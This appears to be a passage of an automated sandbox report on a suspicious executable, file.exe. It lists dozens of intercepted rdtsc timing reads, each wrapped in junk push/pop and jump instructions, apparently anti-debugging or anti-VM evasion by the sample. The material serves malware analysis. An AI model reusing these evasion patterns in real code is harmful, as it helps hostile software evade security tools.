Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28A9F second address: A28AAB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC1350240CEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28AAB second address: A28AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D740 second address: A2D744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D744 second address: A2D77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC134D1C055h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FC134D1C053h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D464 second address: A2D46A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30B38 second address: A30B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30B53 second address: A30B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007FC1350240C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30F79 second address: A30F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FC134D1C046h 0x0000000c popad 0x0000000d jmp 00007FC134D1C04Dh 0x00000012 pushad 0x00000013 js 00007FC134D1C04Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A310FA second address: A3110A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007FC1350240C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3110A second address: A3111F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FC134D1C046h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37756 second address: A3775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3775A second address: A37760 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37760 second address: A3778A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC1350240C6h 0x0000000d je 00007FC1350240C6h 0x00000013 jne 00007FC1350240C6h 0x00000019 popad 0x0000001a push ecx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jo 00007FC1350240C6h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 popad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3778A second address: A37798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC134D1C046h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38403 second address: A3840C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A386AE second address: A386B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A386B2 second address: A386BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38C74 second address: A38C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC134D1C046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38F7E second address: A38FD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jp 00007FC1350240C6h 0x00000018 popad 0x00000019 push ecx 0x0000001a jmp 00007FC1350240CAh 0x0000001f jmp 00007FC1350240D9h 0x00000024 pop ecx 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FC1350240CEh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38FD3 second address: A38FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Eh 0x00000007 jg 00007FC134D1C052h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38FEB second address: A38FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3929C second address: A392A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41908 second address: A4190C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4190C second address: A41917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4103E second address: A41042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41042 second address: A41046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A411E2 second address: A41200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC1350240D3h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41340 second address: A41393 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FC134D1C04Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC134D1C050h 0x00000013 pop ebx 0x00000014 jmp 00007FC134D1C054h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FC134D1C050h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push ebx 0x00000026 push edx 0x00000027 pop edx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41393 second address: A41398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41398 second address: A413AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jne 00007FC134D1C046h 0x0000000e popad 0x0000000f jbe 00007FC134D1C05Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A84E second address: A4A870 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC1350240D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48A21 second address: A48A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48E9A second address: A48EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48EA1 second address: A48EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48EA9 second address: A48EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC1350240CDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FDF second address: A48FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FE4 second address: A48FE9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FE9 second address: A48FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FC134D1C046h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FF6 second address: A48FFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4915F second address: A49169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49169 second address: A491A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC1350240C6h 0x0000000a pop ebx 0x0000000b jmp 00007FC1350240D3h 0x00000010 jmp 00007FC1350240D4h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491A1 second address: A491C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 jns 00007FC134D1C059h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491C1 second address: A491F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC1350240CCh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC1350240D7h 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49478 second address: A4947D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48667 second address: A4866B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A501D8 second address: A501DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A501DD second address: A501F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C581 second address: A5C585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F150 second address: A5F156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F156 second address: A5F15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F15A second address: A5F185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b ja 00007FC1350240C6h 0x00000011 jc 00007FC1350240C6h 0x00000017 jmp 00007FC1350240D3h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60E5A second address: A60E8E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 jg 00007FC134D1C05Ch 0x0000000c jmp 00007FC134D1C054h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 pushad 0x00000017 jno 00007FC134D1C046h 0x0000001d jng 00007FC134D1C046h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60E8E second address: A60E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007FC1350240C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6502D second address: A6504F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC134D1C055h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A668D6 second address: A668E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FC1350240C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C1C4 second address: A6C1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C1CC second address: A6C1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C1DB second address: A6C1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FC134D1C046h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C1EB second address: A6C1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A523 second address: 98A53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC134D1C051h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A53B second address: 98A541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C058 second address: A6C064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C064 second address: A6C07B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C07B second address: A6C084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70B99 second address: A70BD7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jc 00007FC1350240C6h 0x00000011 jnc 00007FC1350240C6h 0x00000017 pop esi 0x00000018 jne 00007FC1350240CAh 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC1350240D6h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70BD7 second address: A70BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70BE1 second address: A70BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77024 second address: A7702C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7702C second address: A77036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77036 second address: A7703C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7703C second address: A7705A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC1350240CFh 0x0000000e jp 00007FC1350240C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79AF0 second address: A79B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jne 00007FC134D1C052h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC134D1C059h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A837A0 second address: A837B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC1350240CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A837B0 second address: A837B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A837B9 second address: A837BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A837BE second address: A837DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC134D1C057h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A837DA second address: A83802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC1350240CBh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC1350240D5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83802 second address: A83808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82163 second address: A8216D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82427 second address: A8242C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8242C second address: A82432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8285B second address: A82863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8DFDE second address: A8DFEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FC1350240C8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90FE0 second address: A90FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90FE4 second address: A90FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FC1350240CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA38D9 second address: AA38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3490 second address: AA349B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC1350240C6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA349B second address: AA34A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA34A4 second address: AA34BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC1350240CAh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3600 second address: AA360A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC134D1C04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA94D5 second address: AA94EB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC1350240C6h 0x00000008 jne 00007FC1350240C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA94EB second address: AA94FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC134D1C04Ah 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA94FA second address: AA9500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA964F second address: AA966C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC134D1C058h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA966C second address: AA968B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC1350240CBh 0x00000008 jns 00007FC1350240C6h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FC1350240C6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA968B second address: AA969B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
